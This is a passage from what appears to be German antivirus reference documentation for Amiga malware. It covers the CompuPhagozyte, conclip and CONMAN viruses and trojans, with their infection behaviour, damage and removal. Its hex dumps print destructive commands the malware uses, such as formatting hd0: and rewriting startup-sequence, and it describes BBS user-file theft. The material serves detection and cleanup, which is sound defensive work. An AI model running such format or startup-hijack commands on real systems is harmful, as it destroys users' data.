ist, wird bei jeder neu eingelegten nicht schreibgeschuetzten Disk mit c/Virus-Checker bei mir das Orig-Prg auf 1452 Bytes gekuerzt. (also keine Vermehrung) Empfehlung: loeschen und Orig-Virus-Checker neu aufspielen. - CompuPhagozyte 2 File Laenge ungepackt: 1148 keine Vektoren verbogen sichtbar z.B.: The CompuPhagozyte usw. Erstellt eine Fensterleiste mit dem Text: VirusX 5.00 by ... (Name) Verraet sich, wenn Sie die Fensterleiste anklicken, weil im Gegensatz zum echten VirusX NICHTS passiert. Wartet auf Close- Window und DiskInserted. Schaeden: Solange die Fensterleiste da ist, wird bei jeder neu eingelegten nicht schreibgeschuetzten Disk mit c/VirusX bei mir das Orig-Prg auf 1148 Bytes gekuerzt. (also keine Vermehrung) Empfehlung: loeschen und Orig-VirusX 4.01 neu aufspielen. 6e2e6c69 62726172 79003a63 2f566972 n.library.:c/Vir 75735800 3a632f56 69727573 58005468 usX.:c/VirusX.Th 6520436f 6d707550 6861676f 7a797465 e CompuPhagozyte 20686173 20617474 61636865 6420746f has attached to 20796f75 72207379 7374656d 20210a57 your system !.W 61697420 666f7220 206e6577 20766972 ait for new vir 75732069 6e206f74 68657220 636f6d70 us in other comp 75746572 2d737973 74656d73 20210a20 uter-systems !. 54686520 436f6d70 75506861 676f7a79 The CompuPhagozy 74652069 6e20392e 39312062 79205468 te in 9.91 by Th 6520456d 7065726f 72204f66 20547269 e Emperor Of Tri 6c6c696f 6e202042 79746573 20210000 llion Bytes !.. 56697275 73582035 2e303020 62792053 VirusX 5.00 by S 74657665 20546962 62657474 00000000 teve Tibbett.... Es ist ein Clone aufgetaucht, wobei nur die Texte geaendert wurden. Wieder ein Beispiel fuer geistigen Tiefflug !!! Zu mehr reicht es halt nicht. Geht im Sandkasten spielen, da koennt Ihr Euch niveaumaessig angemessen ausleben !!! Wird weiterhin als CompuPhagozyte 2 erkannt. 79003a63 2f566972 75735a00 0007c000 y.:c/VirusZ..... ;..... 4e6f2076 6563746f 72732063 616e2063 No vectors can c 68616e67 65642061 6e796d6f 72652073 hanged anymore s 6f20796f 75722063 6f6d7075 74657220 o your computer 69732073 61666520 21202120 21200000 is safe ! ! ! .. 56697275 735a2049 4920312e 30322047 VirusZ II 1.02 G 656f7267 2048f672 6d616e6e 00000000 eorg H.rmann.... - CompuPhagozyte 3 File bekannte Filelaengen: 568 Bytes 592 Bytes Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. Cool immer $7C000 Wahrscheinlich als cls-Befehl getarnt, da mit mehreren " ",0a das Shell-Fenster geloescht wird. fuer mich KEIN Virus, Routine veraltet, KEINE Vermehrung im Prg zu lesen: 200A5468 6520434F 4D505550 6861676F .The COMPUPhago 7A797465 20696E20 392E3931 20212121 zyte in 9.91 !!! 0A546865 20456D70 65726F72 204F6620 .The Emperor Of 5472696C 6C696F6E 20427974 65732073 Trillion Bytes s 7472696B 65732062 61636B20 21210A1F trikes back !!.. Legt ab $7C000 ein kleines Prg ab, das durch cool resetfest sein soll (geht z.B nicht mit 1Mb). Dieses Prg loescht Cold, Warm, KickMem, KickTag, KickCheckSum. KS2.04 : GURU A nach Reset Empfehlung: File loeschen Erkennung im Speicher mit VT: ja Fileerkennung mit VT : 08.10.92 - Compu3-TAI11 Clone: File Laenge 592 Namensbegruendung: 20542041 20492020 31312020 202e2e2e T A I 11 ... - CompuPhagozyte 4 File bekannte Filelaengen : 916 Bytes : 952 Bytes Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. Cool immer $7C600 , OldOpenLib immer $7E000 Reserviert mit AllocAbs 3 Speicherbereiche: $7C000 ganzes VirusPrg $7C600 CoolRoutine fuer RESET $7E000 OldOpenLibRoutine fuer Vermehrung df0:A0A0A0A0 (unsichtbar in Root) df0:s/startup-sequence A0A0A0A0 COMPUPhagozyte !!! am Fileende zu lesen (s.u.) Testet OldOpenLib auf $FC1430 = KS 1.2 , falls nein wird neue OldOpenLib-Vektor-Routine NICHT kopiert. D.h. eine Vermehrung ist nicht moeglich. Wegen der Vorgabe (s.o.) ist nur eine Ver- mehrung in DF0 moeglich. Am Anfang des Files steht KEIN Text "Compu...". KS2.04 : Nach Tastatur-Reset Uebergang in Dauer-Reset. Typ C 4: e1ce0007 e1d04446 303aa0a0 a0a00000 ......DF0:...... 4446303a 732f7374 61727475 702d7365 DF0:s/startup-se 7175656e 63650000 a0a0a0a0 0a200a54 quence....... .T 6865206d 69676874 206f6620 54686520 he might of The 456d7065 726f7220 69732075 6e6c696d Emperor is unlim 69746564 20212121 0a200a43 4f4d5055 ited !!!. .COMPU 50686167 6f7a7974 65202121 210a0000 Phagozyte !!!... Hinweis: Es ist ein CompuPhagozyte-Clone aufgetaucht. Filename: VT-Faster. So ein Programm habe ich nie geschrieben. Laenge gepackt: 860 Bytes Laenge ungepackt: 916 Bytes Nur Text geaendert und Vermehrung jetzt auf HD0. Das File wird jetzt in c als VT abgelegt. Falls Sie da einen Original- VT (so heisst aber mein File NICHT) liegen haetten, wuerde das File zerstoert. e1ce0007 e1d04844 303a632f 56540000 ......HD0:c/VT.. 4844303a 732f7374 61727475 702d7365 HD0:s/startup-se 7175656e 63650000 632f5654 0a200a55 quence..c/VT. .U ;..... 6520776f 726c6421 0a200a4d 6178206f e world!. .Max o 66205374 61726c69 67687420 210a0000 f Starlight !... - CompuPhagozyte 5 File bekannte Filelaengen: 892 Bytes 900 Bytes 936 Bytes (1.Hunk $CF) 936 Bytes (1.Hunk $CD) Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. Cool immer $7C600 , OldOpenLib immer $7E000 Reserviert mit AllocAbs 3 Speicherbereiche: $7C000 ganzes VirusPrg $7C600 CoolRoutine fuer RESET $7E000 OldOpenLibRoutine fuer Vermehrung :A0A0A0A0 (unsichtbar in Root) :s/startup-sequence Also keine Festlegung auf DF0 mehr. COMPUPhagozyte jetzt auch am Fileanfang zu lesen: 434f4d50 55506861 COMPUPha 676f7a79 74650a00 gozyte.. Neu: KEIN Test auf OldOpenLib = $FC1430 = KS 1.2 mehr. KS2.04 : Nach Tastatur-Reset Uebergang in Dauer-Reset. Vermehrung: Falls ein anderes Prg die oldopenlib-Routine aufruft, wird eine Vermehrung versucht. Kein Schreibschutztest vorher. Speicher ab $7C000 soll als A0A0A0A0-File auf Disk geschrieben werden. Danach wird die startup-sequence geaendert. Empfehlung: sofort loeschen und auch startup-sequence ueber- pruefen. Typ 5: 00000000 00000000 00000000 00003aa0 ..............:. a0a0a000 3a732f73 74617274 75702d73 ....:s/startup-s 65717565 6e636500 a0a0a0a0 0a200a54 equence...... .T 6865206d 69676874 206f6620 54686520 he might of The 456d7065 726f7220 69732075 6e6c696d Emperor is unlim 69746564 20212121 0a200a00 000003ec ited !!!. ...... - CompuPhagozyte 6 File bekannte Filelaengen: 1008 Bytes 1048 Bytes Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. :A0A0A0A0 (unsichtbar in Root) :s/startup-sequence A0A0A0A0 immer ab $7C000 Verbogene Vektoren: Cool, OldOpenLib, NEU: jetzt wird auch SumKickData verbogen. Im File am Anfang jetzt erweiterter Text: 3e434f4d 50555068 >COMPUPh 61676f7a 79746520 50726f74 65637469 agozyte Protecti 6f6e2046 696c6520 on File Sie muessen auch die s.-seq. mit einem Editor bearbeiten. VT kennt File und Speicher: 24.11.92 - CompuPhagozyte 7 Link Speicher immer ab $7C000, Cool, OldOpenLib, SumKickData, DoIo, $6c, Open, Lock, LoadSeg, Rename KS1.3 ja KS2.04: nach Aktivierung des Teils und Aufruf eines anderen Programms, das ebenfalls einen obengenannten Dos-Vektor benutzt, bei mir immer Absturz. Soll sich ans Ende des 1.Hunks schreiben. Sucht nach $4E75 (RTS) und ersetzt durch $4E71 (NOP). Verlaengert ein File um #1740 Bytes ($1b3x4). In File ist zu lesen: 732e6c69 62726172 7900436f 6d707550 s.library.CompuP 6861676f 4c696e6b 20627920 54686520 hagoLink by The ^^^^ 456d7065 726f7220 4f662054 72696c6c Emperor Of Trill 696f6e20 42797465 ff6c33ee ffe20007 ion Byte.l3..... VT sollte das Teil im Speicher erkennen und abschalten koennen. Die Virus-Routine enthaelt mehrere Fehlerquellen. Es duerften haeufig nicht lauffaehige oder nicht vermehrungsfaehige Files entstehen. VT bietet Ausbau an. Bitte machen Sie vorher eine Kopie. Sie MUESSEN mit der Meldung Hunk-Struktur-defekt rechnen. Danke !! - CompuPhagozyte 8 FileVirus Laenge: 1952 Bytes Im Speicher immer ab $7C000, Vektoren werden teilweise nach $7A000 gerettet. Cool $7C22A, DoIo $7C2C4, SumKickData $7C5F2, Open $7C3CA, Lock $7C3FA, LoadSeg $7C39A und $6C $7C68a . Wie Sie erkennen koennen sind im Vergleich zu Vorgaengerversionen noch mehr Vektoren verbogen und OldOpenLib wurde aufgegeben. Ob Nano2 von Compu 8 abgeschrieben ist oder umgekehrt oder ob es sich um den gleichen Programmierer handelt, kann ich nicht entscheiden. Sicher ist, dass die gleiche Fehlerquelle (s.u.) enthalten und der Ablauf gleich ist. Namensbegruendung: Im File ist decodiert zu lesen: The Emperor of Trillion Bytes presents:... a new CompuPhagozyte !!! Dieser Zeilen werden vom Programm nie decodiert. Das Virusteil versucht durch einen Text am Fileanfang zu ver- wirren: 20202020 203a416d :Am 69676144 4f532044 61746166 696c6520 igaDOS Datafile 40203139 38382062 79204342 4d202020 @ 1988 by CBM 20200a54 68697320 66696c65 20636f6e .This file con 7461696e 7320696d 706f7274 616e7420 tains important 6469736b 20646174 6120666f 72200042 disk data for .B 6c6f636b 20416c6c 6f636174 696f6e20 lock Allocation 21200a20 3e3e3e20 5741524e 494e473a ! . >>> WARNING: 2044656c 6574696f 6e206f66 20746869 Deletion of thi 73206669 6c652063 6f756c64 20006465 s file could .de 7374726f 7920616c 6c206469 736b2064 stroy all disk d 61746173 20212121 203c3c3c 0a00 atas !!! <<<.. Vermehrung: - Test ob unsichtbares File A0A0A0A0 schon da ist. Wenn ja keine Verseuchung (Fortschritt gegen frueheren Versionen) - Schreibt Virusteil in RootDir (festgelegt mit :) - Besorgt #1006 Bytes Speicher - Versucht :s/startup-sequence zu oeffnen und #1000 Bytes zu lesen. KEIN Test von d0 - Schreibt im Speicher 6 Bytes vor die startup-sequence A0A0A0A0200A - Schreibt #1006 Bytes auf Disk - Protect VirusFile und Startup-sequence Fehlerquellen: Da immer #1000 Bytes eingelesen und #1006 Bytes zurueck- geschrieben werden, treten Fehler auf. a) ihre s-seq. war kuerzer, dann wird der Rest mit Speichermuell zurueckgeschrieben und es gibt Meldungen wie xyz not executable weil zufaellig im Speichermuell etwas verwertbares stand. b) Ihre s-seq. war laenger, dann wird ein Teil abgeschnitten und Sie wundern sich, warum z.B. loadwb nicht mehr ge- startet wird. Fehlerquelle2 : Das Virusteil verraet sich nach einem Reset und schreibge- schuetzter Disk mit einem SystemRequest: Volume xyz is write protected VT loescht das VirusFile Bitte denken Sie daran, dass Sie mit einem Editor die 1.Zeile der startup-sequence loeschen muessen. Auf Grund der Fehler- quellen kann es aber auch sein, dass Sie die startup-sequence voellig neu schreiben muessen. Denken Sie bitte daran, dass Sie vorher in VT im Filerequester die startup-sequence un- protecten muessen !!!! - conclip-Virus andere moegliche Namen: ANDY, HEXER Typ A: Laenge gepackt: 3248 Bytes Laenge entpackt: 2872 Bytes (ja die Zahlen stimmen) KEINE verbogenen Vektoren VT erwartet fuer die Erkennung den Filenamen "conclip" Vermehrung: ja Im entpackten File ist zu lesen z.B.: 2940fdac 41fa0006 2008600e 4446303a )@..A... .`.DF0: 632f636f 6e636c69 70002940 fdc0202c c/conclip.)@.. , ;...... 700f2f00 41fa0006 20086014 416d6967 p./.A... .`.Amig 61444f53 20434c49 2d457272 6f720000 aDOS CLI-Error.. ;...... 41fa0006 2008602a 4469736b 20636f72 A... .`*Disk cor 72757074 202d2070 6c656173 6520696e rupt - please in 73657274 20626f6f 74646973 6b2e2e2e sert bootdisk... ;...... fff441fa 00062008 60266563 686f2063 ..A... .`&echo c 6f6e636c 6970203e 6466303a 732f7374 onclip >df0:s/st 61727475 702d7365 7175656e 63650000 artup-sequence.. ;...... 60387275 6e203e4e 494c3a20 7379733a `8run >NIL: sys: 73797374 656d2f66 6f726d61 74203e4e system/format >N 494c3a20 44524956 45206864 303a204e IL: DRIVE hd0: N 414d4520 414e4459 00002e80 70002f40 AME ANDY....p./@ Betroffene Medien: DF0:, DF1:, DH0:, DH1:, HD0: u. HD1: Hinweis: das Conclip-File gibt es wirklich mit anderer Laenge. Ablauf: Ein Fenster wird geoeffnet. Titelleiste: AmigaDOS... siehe oben Ein Text wird ausgegeben: Disk corrupt ... siehe oben conclip wird nach c kopiert. Die startup-seq. wird veraendert. Conclip wird also danach nach jedem Reset aufgerufen. Das Formatieren meiner Festplatte habe ich nicht abgewartet (dos-delay). Es ist noch eine Textausgabe in diesem File, die ich aber nicht auf dem Bildschirm gesehen habe. VT bietet nur Loeschen an. Bitte vergessen Sie nicht, auch die startup-sequence zu aendern. Typ B: bekannte Laengen mehrfach gepackt: 6952 Bytes (Installer) 11048 Bytes (Installer) Installer-Filenamen sind unbekannt. Laenge mehrfach entpackt: 6096 Bytes KEINE verbogenen Vektoren Mehrfach entpackt und mit "EORI.B #$42,(A2)+" behandelt ist im File zu lesen: 6f20746f 20626564 21290a0a 7c7c2042 o to bed!)..|| B 45412049 2057494c 4c204e45 56455220 EA I WILL NEVER 464f5247 45542059 4f552e20 52455354 FORGET YOU. REST 20494e20 58544320 7c7c0a0a 414e4459 IN XTC ||..ANDY 20544845 20484558 45522121 0a0a0a0a THE HEXER!!.... ;...... fdc87000 4e5d4e75 3a204e41 4d452041 ..p.N]Nu: NAME A 4e44595f 49535f42 41434b00 72756e20 NDY_IS_BACK.run 3e4e494c 3a207379 733a7379 7374656d >NIL: sys:system 2f666f72 6d617420 3e4e494c 3a204452 /format >NIL: DR 49564520 00496e73 65727420 626f6f74 IVE .Insert boot 6469736b 20696e20 4446303a 004e6f74 disk in DF0:.Not 20612044 4f532d64 69736b21 00537973 a DOS-disk!.Sys 74656d6d 656c6475 6e67003a 532f5374 temmeldung.:S/St 61727475 702d5365 7175656e 6365003a artup-Sequence.: 432f436f 6e436c69 70004446 30004446 C/ConClip.DF0.DF 31004844 31004448 31004844 30004448 1.HD1.DH1.HD0.DH 30005052 4f474449 523a636f 6e636c69 0.PROGDIR:concli 7000536e 6f6f7044 6f730053 4e4f4f50 p.SnoopDos.SNOOP 444f5300 74ff4e75 4e7541fa 0060216f DOS.t.NuNuA..`!o Aenderungen bei Typ B: Schreibt jetzt ConClip Testet auf SnoopDos Schreibt nach Speicherstelle #$0 HELP Schreibt nach Speicherstelle #$100 0100: DEADBABE BEA0FACE Dieser Text erscheint bei mir nach einem Tastaturreset auch in einem Alert. Wenn Sie einige Zeit warten, wird eine Graphik ausgegeben: - dunkler Hintergrund - in sehr grossen Buchstaben HEXER (rot ausser X ist blau) - in kleineren, hellen Buchstaben darunter: ANDY THE HEXER IS BACK... Spielen Sie den Original-conclip-Befehl nach c: und ueber- pruefen Sie auch ihre Startup-sequence. - Condom1.5-Trojan siehe bei Joker-Trojan Typ B - ConfTop-Trojan gegen AmiExpress Laenge ungepackt: Conftop.000 38322 Bytes Conftop.020 38300 Bytes Falls es zu Verwechslungen mit einem echten Conftop-Prg kommt, rufen Sie mich bitte an und schicken mir ein Orig-ConfTop zu. Das Verhalten wurde nicht getestet, da ich kein AmiExpress habe. Fremdaussage: Entscheiden Sie selbst !!!!!! @BEGIN_FILE_ID.DIZ FAKE FAKE FAKE FAKE FAKE FAKE FAKE FAKE FAKE -------------------------------------------- BOBO/MYSTIC SAYS : I *NEVER* RELEASED THE CONF-TOP! NUKE AND BEAWARE OF THE FILE : 'MST-CF22.LHA'!!!.. IT *MAY* FORMAT YOU'RE HD! A BACKDOOR IS FOR SURE!!! IT'S AN OLD VERSION OF CONFTOP! /BOBO oF MYStIC! @END_FILE_ID.DIZ What?!... Ok... It goes like this!... The file 'MST-CF22.LHA' is a F A K E! I never done that! it's probably a hd crasher!... So DON'T use it! and NUKE it on every board! - CONMAN-4EB9-Virus Link-File Typ A: Filename: hack Laenge : 4388 Bytes Nach FileID: MASTER AMIEX ONLINE PW HACKER So etwas ist auch am Fileende zu lesen. VT bietet nur loeschen an, weil der 2. Teil nur ein Dummy ist. Es wurden mit der 4eb9-Methode zwei Teile zusammengelinkt. Im entpackten 1.Teil ist zu lesen: 433a4449 52007261 6d6c6962 C:DIR.ramlib 0052414d 00426163 6b47726f 756e645f .RAM.BackGround_ 50726f63 65737300 4c3a4661 73744669 Process.L:FastFi 6c655379 7374656d 004c4942 533a6761 leSystem.LIBS:ga 64746f6f 6c732e6c 69627261 72790057 dtools.library.W 6f726b62 656e6368 00434c49 2830293a orkbench.CLI(0): 6e6f2063 6f6d6d61 6e64206c 6f616465 no command loade 6400434c 49283129 3a6e6f20 636f6d6d d.CLI(1):no comm 616e6420 6c6f6164 65640043 4f4e0052 and loaded.CON.R 414d0044 46300052 414d0061 64646275 AM.DF0.RAM.addbu 66666572 7300434f 4e004c49 42533a72 ffers.CON.LIBS:r 65712e6c 69627261 72790000 00000000 eq.library...... ;..... 433a0000 5359533a C:..SYS: 544f4f4c 532f0000 5359533a 5554494c TOOLS/..SYS:UTIL 49544945 532f0000 5359533a 50524546 ITIES/..SYS:PREF 532f0000 5359533a 4c494253 2f00 S/..SYS:LIBS/. Ablauf: Es wird ein Prozess eingerichtet. Der Prozessname wird in Ab- haengigkeit von $DFF006 aus der Liste (s.o.) ausgewaehlt. Mit diesem Prozess sollen verschiedene Unterverzeichnisse (s.o.) verseucht werden. Es wird mit der 4EB9-Methode ein Conman-Teil an die Files angelinkt. Eine Mehrfachverseuchung soll vermieden werden, indem auf "4EB9 schon vorhanden" geprueft wird. Das Teil mag auch nicht alle Hunktypen am Ende. Nach einem DosDelay (wieder abhaengig von $DFF006) startet das Ganze neu. Der staendige Zugriff MUSS auffallen !!!!!!!! Bei meinen Tests stand der Prozess SEHR selten in der WAIT-Liste. Es besteht also die Gefahr, dass VT den Prozess im Speicher NICHT findet. Typ B: Filename: Bloody.exe Laenge: 25560 Hauptunterschied zu Typ A: 7900433a 00000000 00000000 00000000 y.C:............ 00000000 00000000 00000000 00000000 ................ Es sollen also nur Files in C: verseucht werden. - CONMAN-4EB9 Trojan Zerstoerung Filename: abhaengig was z.B. in C: steht. Laenge: Ursprungsfilelaenge + #1836 Bytes VT versucht den Ausbau. (denken Sie bitte aber an die "falschen" Aenderungen s.o.) Mit der 4EB9-Methode hat sich ein Conman-Teil an ein File angelinkt (s.o.). Im entpackten 2.Link ist zu lesen: 433a4449 52007261 6d6c6962 C:DIR.ramlib 00444630 00426163 6b47726f 756e645f .DF0.BackGround_ 50726f63 65737300 4c3a4661 73744669 Process.L:FastFi 6c655379 7374656d 004c4942 533a6761 leSystem.LIBS:ga 64746f6f 6c732e6c 69627261 72790057 dtools.library.W 6f726b62 656e6368 00434c49 2830293a orkbench.CLI(0): 6e6f2063 6f6d6d61 6e64206c 6f616465 no command loade 6400434c 49283129 3a6e6f20 636f6d6d d.CLI(1):no comm 616e6420 6c6f6164 65640043 4f4e0052 and loaded.CON.R 414d0044 46300052 414d0061 64646275 AM.DF0.RAM.addbu 66666572 7300434f 4e004c49 42533a72 ffers.CON.LIBS:r 65712e6c 69627261 72790000 eq.library.. ;..... 434f4e4d 414e2056 CONMAN V 49525553 20313939 3500646f 732e6c69 IRUS 1995.dos.li 62726172 7900646f 732e6c69 62726172 brary.dos.librar 79004446 30004446 31004446 32004446 y.DF0.DF1.DF2.DF 33005241 4d005241 44000000 3.RAM.RAD... Ablauf: Es wird ein Prozess eingerichtet. Der Prozessname wird in Ab- haengigkeit von $DFF006 aus der Liste (s.o.) ausgewaehlt. Das Prozessor-DosDelay wird wieder ueber $DFF006 festgelegt. Dieser Prozess soll auf den Laufwerken (DF0 usw.) einzelne Files auswaehlen (wieder mit $DFF006) und in diese "CONMAN Virus 1995" schreiben. Diese Files waeren dann unbrauchbar. Diese Files habe ich bei Tests NIE gesehen. Zum Glueck hat sich bei mir der Prozess IMMER mit GURU verabschiedet !!! Hinweis zum Ausbau: Bitte ueberlegen Sie, ob es nicht ver- nuenftiger ist, von einer Original-WB-Disk das c-Verzeichnis zu kopieren. VT braucht dann nur die Befehle zu bearbeiten, die nicht vom Original-C-Verzeichnis kommen. VT versucht auch die "falschen" Aenderungen (s.o.) rueckgaengig zu machen. - CONMAN-BBS-Trojan Laenge gesamt: 50288 Bytes Typ A: Trojan-Teil gepackt: 2704 Bytes Trojan-Teil entpackt: 2496 Bytes Ein $4EB9-$4EF9-Link an ARTM 2.3 . 4f4b2021 00000000 414d4947 41205265 OK !....AMIGA Re 616c7469 6d65204d 6f6e6974 6f722056 altime Monitor V 322e3320 44617465 2039332f 31312f31 2.3 Date 93/11/1 3100434f 50595249 47485420 42592054 1.COPYRIGHT BY T Nach meinem Wissensstand gibt es im Nov. 93 diese Versions- nummer noch gar nicht. Es handelt sich um eine V1.6 . Namensbegruendung: decodiert ist im Speicher zu lesen: 434f4e4d 414e2f48 41434b4d 41535445 CONMAN/HACKMASTE 522f3933 2f54524f 4a414e2d 56495255 R/93/TROJAN-VIRU 53092e2e 00000000 00000000 00000000 S............... Das Gesamtfile lauft nur auf Prozessoren ab 68020 ohne GURU, da im Trojan-Teil ungerade Adressen verwendet werden. Schaeden: Sucht nach USER.KEYS und USER.DATA. Diese Files sollen mit dosopen, dosread, doswrite und dosclose bearbeitet werden. Hinweis: Es wird das $4EB9-$4EF9-Link-Programm gesucht. Da Ende Nov 93 schlagartig mehrere solche Links aufgetaucht sind, vermute ich, das es dafuer ein Programm gibt. Das Link-Prg. scheint nicht sehr gut zu sein . Siehe Hinweis 2 Hinweis 2: VT bietet Ausbau an. ABER !!!!!! ARTM1.6-Orig ARTM2.3-Link 000: 000003ec 0000018a ........ 000: 000003ec 0000018a ........ 008: 00000001 000046be ......F. 008: 00000005 0000009c ........ 010: 0000469c 000011ac ..F..... 010: 000000cc 000000e6 ........ 018: 000008c0 000008bc ........ 018: 00000104 00000132 .......2 020: 00002100 000020fc ..!... . 020: 0000014e 0000020c ...N.... 028: 000020f8 000020f4 .. ... . 028: 00000210 00000220 ....... 030: 000020f0 000020ec .. ... . 030: 00000224 00000234 ...$...4 Es werden also voellig wirre Zahlen in die 3EC-Hunks geschrieben. VT stellt zwar die Hunkzahl bei $8 (5 wird zu 1) richtig, ueber- nimmt aber die geaenderten FALSCHEN Werte. Die uneingeschraenkte Lauffaehigkeit des Prg.s wird angezweifelt. Besser Sie loeschen das gelinkte ARTM-Prg. ganz und besorgen sich ein Orig-ARTM . - CONMAN-BBS-Trojan Typ B Maerz 94: Es sollen mehrere Files aufgetaucht sein, in denen Conman zu lesen ist. Es soll versucht werden, user.data zu ver- aendern. Da bisher immer mit 4EB9-4EF9-Links gearbeitet wurde, seien Sie bitte etwas vorsichtig, falls VT dies anzeigt. Gefahr besteht aber nur fuer AMI-BBS . - CONMAN-BBS-Trojan Typ C Laenge 1432 oder 1676 Bytes Wurde gefunden in Best-Boxes (L:14608 Bytes) War $4EB9-Link - CONMAN-Dir-Trojan File gepackt: 4004 Bytes VT bietet bei Filetest Loeschen an. entpackt: 8456 Bytes VT bietet bei Filetest Ausbau an. KS2.04 mit 68030: ja VT sollte den Process im Speicher finden. VT bietet Loeschen an. Sie muessen mit GURU rechnen. Haengt an einem Dir-Befehl. Das RTS im Dir-Befehl wurde durch ein JMP Virusteil ersetzt (von Hand ?). Im Virusteil wird jsr -$xy(A5) verwendet. Im Speicher ist zu lesen: 576f726b 62656e63 68200064 6f732e6c Workbench .dos.l 69627261 72790069 6e747569 74696f6e ibrary.intuition 2e6c6962 72617279 00444630 3a432f44 .library.DF0:C/D 49520043 3a444952 00444556 533a5359 IR.C:DIR.DEVS:SY 5354454d 2d434f4e 46494755 52415449 STEM-CONFIGURATI 4f4e0043 3a4c4f41 44574200 4c3a5241 ON.C:LOADWB.L:RA 4d2d4841 4e444c45 5200536e 6f6f7044 M-HANDLER.SnoopD 6f7300b6 b6b6b6b6 b6b6b6b6 b6b6b6b6 os.............. Ablauf: - SnoopDos wird gesucht und falls gefunden abgeschaltet. (Signal) - Ein Process mit Namen "Workbench " wird angelegt. Vermehrung: ^ Das Virusteil wird nach $70000 im Speicher kopiert und von da als Dir geschrieben. Schaeden: Sobald eine Zaehlzelle den Wert 7 erreicht hat wird geloescht: - devs:system-configuration - c:loadwb - l:ram-handler Danach wird ein Text mit move.b (a0)+,(a1)+ eori.b #$96,(a0) decodiert und mit DisplayAlert ausgegeben. 20202020 20205448 49532049 53204e4f THIS IS NO 54204120 53595354 454d2041 4c455254 T A SYSTEM ALERT 21205448 49532049 53205448 45204e45 ! THIS IS THE NE 5720434f 4e4d414e 2d54524f 4a414e20 W CONMAN-TROJAN 56495255 53212020 20202020 20202020 VIRUS! ;.... 20202041 4c4c2044 49534b20 41435449 ALL DISK ACTI 56495449 45532057 494c4c20 42452044 VITIES WILL BE D 49534142 4c454421 20202020 20202020 ISABLED! ;usw. Zuletzt geht das Programm in eine Endlosschleife. D.h. Sie muessen einen Tastatur-Reset ausfuehren. - CONMAN-Dir-Inst ???? VT glaubt (!!!!!!!! aber NICHT sicher) ein File gefunden zu haben, an das mit der $4EB9-4EF9-Methode ein Virusteil an- gelinkt wurde. Loeschen Sie also bitte nicht sofort das File, sondern untersuchen Sie zuerst das Teil. Falls das File ge- packt ist, dann entpacken Sie es mit einem Entpacker ihrer Wahl. Falls Sie nun mit einem Filemonitor oder mit VT-Filereq das File anschauen und den Text CONMAN finden, so duerfte es sich um ein verseuchtes File handeln. Fuer die Zusendung waere ich dankbar (vorher anrufen). - CONMAN-format Zerstoerungsfile CONMAN-P-4EB9-Form. CONMAN-P-Format Filename: z.B. Best-Boxes Filelaengen: 14092, 14608, 13128, oder 13728 Bytes KS1.3 nein (LockPubScreen) Keine verbogenen Vektoren Keine Vermehrung VT bietet Loeschen an. Im File ist entpackt (falls notwendig) zu lesen: 43442d52 4f4d0000 CD-ROM.. ;..... 44463000 44463100 44463200 44463300 DF0.DF1.DF2.DF3. 52414d00 52414400 52414d3a 46005241 RAM.RAD.RAM:F.RA 4d3a5200 M:R. ;..... 204e414d 4520434f 4e4d414e 5f30204e NAME CONMAN_0 N 4f49434f 4e530000 52414d3a 52203e4e OICONS..RAM:R >N 494c3a20 52414d3a 46204452 49564520 IL: RAM:F DRIVE Ablauf: Das Teil hat KEINE Wartezeit. Das Teil richtet einen Prozess ein (CD-ROM). Diesen Prozess kann VT NICHT finden, da er nach einem Durchlauf sofort wieder ver- schwindet. Der Bildschirm wird dunkel geschaltet (SetRGB). Das MUSS auf- fallen. Das Teil enthaelt zwei gepackte Original-C-Befehle (run, format), die nach RAM: (R, F) kopiert werden. Danach wird der Execute-Befehl mit RAM:R >NIL ...usw. siehe oben aufgerufen. Ohne angemeldete RAM: geht es nicht. Betroffene LWe sollen sein: DF0: - RAD: siehe oben - CONMAN-HD-FAKER Zerstoerungsfile Moeglicher Filename: keymaker da am Fileende zu lesen ist: USAGE:KEYMAKER -i -a <REGISTRATION-NAME> <DEST> usw. Filelaenge: 1596 Bytes Keine verbogenen Vektoren Keine Vermehrung VT bietet nur Loeschen an, da der keymaker-teil KEINE Funktion erfuellt. Mit der 4EB9-Methode wurden zwei Teile zusammengelinkt. Das Virusteil (1.Link) ist noch gepackt. Entpackt ist in diesem Teil zu lesen: 11534353 492d4844 2d46414b 45522057 .SCSI-HD-FAKER W 52495454 454e2042 5920434f 4e4d414e RITTEN BY CONMAN ;... 72617279 00736373 692e6465 76696365 rary.scsi.device 0a006776 70736373 692e6465 76696365 ..gvpscsi.device 0a006d61 78786f6e 2e646576 6963650a ..maxxon.device. 0000616c 66736373 692e6465 76696365 ..alfscsi.device 0a00636f 6e6d616e 0a00300a 00000000 ..conman..0..... Schaden: Nach bestimmten devices (s.o.) wird gesucht und dann der Rigid- Disk-Block codiert zurueckgeschrieben. Eine Decodierung ist NICHT moeglich. Da Sie aber ja schon vor laengerer Zeit mit VT ein Backup dieses Bereichs angefertigt haben, brauchen Sie das Teil nur zurueckzuspielen, nachdem Sie mit der HDTOOLBox die Festplatte wieder angemeldet haben. Nicht schlecht waere vielleicht auch ein Ausdruck von VT-LWInfo, damit Sie die richtige Zylinderzahl usw. eintragen koennen. Am Ende der Zerstoerungsroutine wird ein Alerttest ausgegeben: "SCSI-HD..."usw. siehe oben - CONMAN-HYPER-Trojan Einbruchswerkzeug in BBS Typ A: Laenge gepackt: 1948 Bytes Laenge ungepackt: 1380 Bytes Z.B. vor WorldClock (siehe unten) gelinkt. Im File ist zu lesen: 00000000 00000000 00000000 4242533a ............BBS: 55534552 2e444154 41004242 533a5553 USER.DATA.BBS:US 45522e4b 45595300 646f732e 6c696272 ER.KEYS.dos.libr 61727900 41452e4d 61737465 7200434f ary.AE.Master.CO 4e4d414e 00000000 00000000 00000000 NMAN............ ;...... 00000000 00008948 59504552 00000000 .......HYPER.... Keine verbogenen Vektoren. Kein neuer Process im Speicher. Kein Befehl wird ins C-Verzeichnis geschrieben. Das Teil ist "nur" fuer Sysops gefaehrlich. VT bietet Loeschen an, falls Sie das Teil je einzeln finden. Das Teil schreibt fuer die Selbsterkennung #$2B mach $00000000. Das Teil sucht nach einem AE.Master-Port. Falls nicht gefunden, Ende. Danach wird versucht USER.DATA und USER.KEYS auszulesen. - CONMAN-Iprefs-Inst. File Filename: HACKT.EXE Laenge 